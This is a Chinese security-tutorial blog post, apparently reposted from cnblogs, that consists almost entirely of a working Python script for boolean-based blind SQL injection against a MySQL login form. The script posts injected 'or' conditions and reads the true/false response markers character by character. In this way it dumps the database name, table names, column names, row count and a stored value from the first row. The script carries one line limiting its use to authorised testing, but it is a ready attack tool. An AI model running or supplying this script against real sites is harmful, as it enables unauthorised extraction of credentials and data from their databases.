  • 从零开始学安全(三十五)●mysql 盲注手工自定义python脚本

    import requests
    import string
    #mysql  手动注入 通用脚本 适用盲注 可以跟具自己的需求更改
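    def home(url="url", success="", error="", table="table", col="user",
             session=None, prefix="admin%1$'", username_field="username",
             password_field="password", charset=None, timeout=10,
             max_probe=10000):
        """Dump schema and one value through a boolean-based blind MySQL
        injection in a login form (generic template, adjust to the target).

        Every probe POSTs ``{username_field: prefix + " or " + <condition> + "#",
        password_field: 1}`` and reads the truth of ``<condition>`` from the
        response body: the length/count probes stop at the first value for
        which the ``error`` marker appears, the per-character probes accept a
        candidate when the ``success`` marker appears.  Steps, in order:
        current database name, base tables in it (``group_concat``), the
        columns of ``table``, the row count of ``table`` and the ``col`` value
        of its first row.

        Args:
            url: login endpoint to POST to.
            success: substring present in the response when the injected
                condition is true.
            error: substring present in the response when it is false.
            table: table whose columns and first row are dumped.
            col: column of ``table`` whose first-row value is dumped.
            session: object with ``post(url, data=..., timeout=...)`` whose
                result has ``.text``; defaults to ``requests.session()``.
                Pass a fake to exercise the extraction logic offline.
            prefix: text placed before ``or``; the original script used
                ``admin%1$'`` (presumably a format-string quirk of its target
                that defeats quote escaping - verify for other targets).
            username_field: form field carrying the payload.
            password_field: second form field; the original posted it as
                ``passwrod`` in all but one place, which no form would read.
            charset: candidate characters tried in order for each position;
                defaults to digits, ASCII letters and a punctuation set.
            timeout: per-request timeout in seconds, so a dead target does
                not hang the scan forever.
            max_probe: cap on the linear length/count search, so wrong
                markers cannot loop endlessly.

        Returns:
            dict with ``database``, ``tables``, ``columns`` (comma-separated
            ``group_concat`` strings), ``rows`` (int) and ``value``.

        Raises:
            ValueError: if ``success`` or ``error`` is empty - an empty string
                is a substring of every response, so every probe would match.
            RuntimeError: if a length/count search exceeds ``max_probe``.

        Caveats: ``group_concat`` output is truncated at the server's
        ``group_concat_max_len``; ``ascii()`` only sees the first byte of a
        multi-byte character, and a position matching nothing in ``charset``
        is reported and skipped.  Use only against systems you are
        authorised to test.
        """
        if not success or not error:
            raise ValueError("success and error response markers must both be set")
        if charset is None:
            charset = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=<>,./?"
        sess = session if session is not None else requests.session()

        def seen(condition, marker):
            """POST one probe and report whether ``marker`` is in the body."""
            data = {username_field: prefix + " or " + condition + "#",
                    password_field: 1}
            # .text (decoded str) rather than .content: on Python 3 .content is
            # bytes and ``str in bytes`` raises TypeError.
            body = sess.post(url, data=data, timeout=timeout).text
            return marker in body

        def count_up(lhs):
            """Return the integer value of SQL expression ``lhs``.

            Probes ``lhs > i`` for i = 0, 1, ...; the first i reported false
            (error marker present) equals the value.
            """
            for i in range(max_probe + 1):
                if seen("%s>%d" % (lhs, i), error):
                    return i
            raise RuntimeError("no value found below %d for %s" % (max_probe, lhs))

        def extract(expr, length):
            """Recover ``length`` characters of SQL expression ``expr``."""
            out = []
            # substr() is 1-indexed in MySQL, hence positions 1..length.
            for pos in range(1, length + 1):
                for ch in charset:
                    cond = "ascii(substr((%s),%d,1))=%d" % (expr, pos, ord(ch))
                    if seen(cond, success):
                        out.append(ch)
                        break
                else:
                    print("[!] position %d of (%s) matched nothing in charset" % (pos, expr))
            return "".join(out)

        # 1. name of the database the login query runs against
        db_len = count_up("length((database()))")
        print("length the database:%d" % db_len)
        database = extract("database()", db_len)
        print("database is :%s" % database)

        # 2. base tables of that database, as one comma-separated string
        tables_expr = ("select group_concat(table_name) from information_schema.tables "
                       "where table_type='BASE TABLE' and table_schema=database()")
        tables_len = count_up("length((%s))" % tables_expr)
        print("length tables is :%d" % tables_len)
        tables = extract(tables_expr, tables_len)
        print("tables is :%s" % tables)

        # 3. columns of the chosen table
        columns_expr = ("select group_concat(column_name) from information_schema.columns "
                        "where table_name='%s' and table_schema=database()" % table)
        columns_len = count_up("length((%s))" % columns_expr)
        print("length columns is :%d" % columns_len)
        columns = extract(columns_expr, columns_len)
        print("columns is :%s" % columns)

        # 4. number of rows in the chosen table
        rows = count_up("(select count(*) from %s)" % table)
        print("[+]number(rows): %d" % rows)

        # 5. value of ``col`` in the first row; its own length is probed first
        #    (the original reused the column-name length here).
        value_expr = "select %s from %s limit 0,1" % (col, table)
        value_len = count_up("length((%s))" % value_expr)
        value = extract(value_expr, value_len)
        print("%s.%s[0] is :%s" % (table, col, value))

        return {"database": database, "tables": tables, "columns": columns,
                "rows": rows, "value": value}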
  • 原文地址:https://www.cnblogs.com/feizianquan/p/10594938.html